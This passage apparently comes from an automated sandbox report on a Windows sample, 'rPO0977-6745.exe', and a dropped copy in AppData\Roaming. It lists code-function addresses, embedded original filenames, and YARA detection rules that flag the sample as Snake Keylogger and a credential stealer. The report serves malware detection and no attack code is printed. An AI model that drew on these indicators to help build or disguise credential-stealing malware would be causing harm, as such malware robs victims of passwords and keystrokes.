              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_02F7D5BC0_2_02F7D5BC
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D192600_2_08D19260
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D139F80_2_08D139F8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D142D00_2_08D142D0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D11AE00_2_08D11AE0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D1ABB80_2_08D1ABB8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D123500_2_08D12350
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D165980_2_08D16598
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D11F180_2_08D11F18
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144610810_2_01446108
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144C19010_2_0144C190
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144B32810_2_0144B328
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144C47010_2_0144C470
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144E43110_2_0144E431
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144C75210_2_0144C752
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144F77810_2_0144F778
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_014497E810_2_014497E8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144688010_2_01446880
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144BBB810_2_0144BBB8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144CA3210_2_0144CA32
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_01444AD910_2_01444AD9
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144BEB010_2_0144BEB0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144357210_2_01443572
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144B4F210_2_0144B4F2
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144D7E010_2_0144D7E0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_0144D7F010_2_0144D7F0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBEE0A10_2_06BBEE0A
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBA60010_2_06BBA600
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB9FB010_2_06BB9FB0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBBF3010_2_06BBBF30
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBAC4810_2_06BBAC48
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB85B010_2_06BB85B0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBC58010_2_06BBC580
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB0D4810_2_06BB0D48
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBB29010_2_06BBB290
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBD21810_2_06BBD218
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB8B9610_2_06BB8B96
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBCBD010_2_06BBCBD0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBB8E010_2_06BBB8E0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB36D810_2_06BB36D8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB5E7010_2_06BB5E70
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB5E6010_2_06BB5E60
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB9FA010_2_06BB9FA0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB6FF810_2_06BB6FF8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB6FE810_2_06BB6FE8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB672010_2_06BB6720
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBBF2010_2_06BBBF20
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB671210_2_06BB6712
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB049810_2_06BB0498
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB048810_2_06BB0488
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB7CF010_2_06BB7CF0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB743F10_2_06BB743F
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBAC3710_2_06BBAC37
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB745010_2_06BB7450
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB55B210_2_06BB55B2
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB85A010_2_06BB85A0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBA5F010_2_06BBA5F0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB55C010_2_06BB55C0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB7D0010_2_06BB7D00
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBC57010_2_06BBC570
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB62BA10_2_06BB62BA
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBB28110_2_06BBB281
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB62C810_2_06BB62C8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB5A1810_2_06BB5A18
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBD20A10_2_06BBD20A
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB5A0810_2_06BB5A08
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB43D810_2_06BB43D8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBCBC010_2_06BBCBC0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB6B7810_2_06BB6B78
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB6B6910_2_06BB6B69
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB336010_2_06BB3360
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB335010_2_06BB3350
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB78A810_2_06BB78A8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB789810_2_06BB7898
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB08F010_2_06BB08F0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB08E110_2_06BB08E1
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBB8D010_2_06BBB8D0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB000610_2_06BB0006
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB285810_2_06BB2858
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB284810_2_06BB2848
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB004010_2_06BB0040
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB513210_2_06BB5132
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB815810_2_06BB8158
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB814810_2_06BB8148
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BB514010_2_06BB5140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_00D4D5BC11_2_00D4D5BC
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8840011_2_04F88400
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8894811_2_04F88948
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8A48111_2_04F8A481
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8004011_2_04F80040
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8001C11_2_04F8001C
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_04F8893B11_2_04F8893B
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_0872851811_2_08728518
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_087239F811_2_087239F8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_08721AE011_2_08721AE0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_087242D011_2_087242D0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_0872235011_2_08722350
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_0872850811_2_08728508
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_0872659811_2_08726598
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_08729D9811_2_08729D98
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_08721F1811_2_08721F18
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4C19023_2_00E4C190
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4610823_2_00E46108
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4B32823_2_00E4B328
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4C47023_2_00E4C470
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4E43123_2_00E4E431
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4F77F23_2_00E4F77F
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4C75123_2_00E4C751
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4688023_2_00E46880
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4985823_2_00E49858
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E44AD923_2_00E44AD9
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4CA3123_2_00E4CA31
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4BBB823_2_00E4BBB8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4BEB023_2_00E4BEB0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4B4F323_2_00E4B4F3
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4357023_2_00E43570
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4D7E023_2_00E4D7E0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E4D7F023_2_00E4D7F0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEE0D23_2_064EEE0D
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EA60023_2_064EA600
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064ED21823_2_064ED218
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EB29023_2_064EB290
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EBF3023_2_064EBF30
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064ECBD023_2_064ECBD0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E8BF923_2_064E8BF9
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E9FB023_2_064E9FB0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EAC4823_2_064EAC48
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EB8E023_2_064EB8E0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E0D4823_2_064E0D48
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EC58023_2_064EC580
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E85B023_2_064E85B0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E5E6323_2_064E5E63
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E5E7023_2_064E5E70
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064ED20A23_2_064ED20A
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E5A0823_2_064E5A08
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E5A1823_2_064E5A18
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E62C823_2_064E62C8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E36D823_2_064E36D8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EB28123_2_064EB281
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E62BC23_2_064E62BC
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E335023_2_064E3350
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E6B6923_2_064E6B69
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E336023_2_064E3360
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E6B7823_2_064E6B78
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E671323_2_064E6713
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E672023_2_064E6720
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EBF2023_2_064EBF20
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064ECBC023_2_064ECBC0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E43D823_2_064E43D8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E6FE823_2_064E6FE8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E6FF823_2_064E6FF8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E9FA023_2_064E9FA0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E284823_2_064E2848
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E744323_2_064E7443
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E004023_2_064E0040
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E285823_2_064E2858
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E745023_2_064E7450
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E000623_2_064E0006
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EAC3823_2_064EAC38
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EB8D023_2_064EB8D0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E08E323_2_064E08E3
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E08F023_2_064E08F0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E7CF023_2_064E7CF0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E048B23_2_064E048B
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E049823_2_064E0498
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E789823_2_064E7898
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E78A823_2_064E78A8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E814823_2_064E8148
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E514023_2_064E5140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E815823_2_064E8158
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E7D0023_2_064E7D00
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E513223_2_064E5132
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E55C023_2_064E55C0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EA5F023_2_064EA5F0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E85A023_2_064E85A0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064E55B323_2_064E55B3
              Source: rPO0977-6745.exe, 00000000.00000002.1269716508.0000000007AF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1265411156.00000000031E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1269312829.0000000007820000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1265815072.000000000436E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000002.1263660255.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 00000000.00000000.1225855306.0000000000CFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 0000000A.00000002.3686556908.0000000000F77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rPO0977-6745.exe
              Source: rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
              Source: rPO0977-6745.exeBinary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe
              Source: rPO0977-6745.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
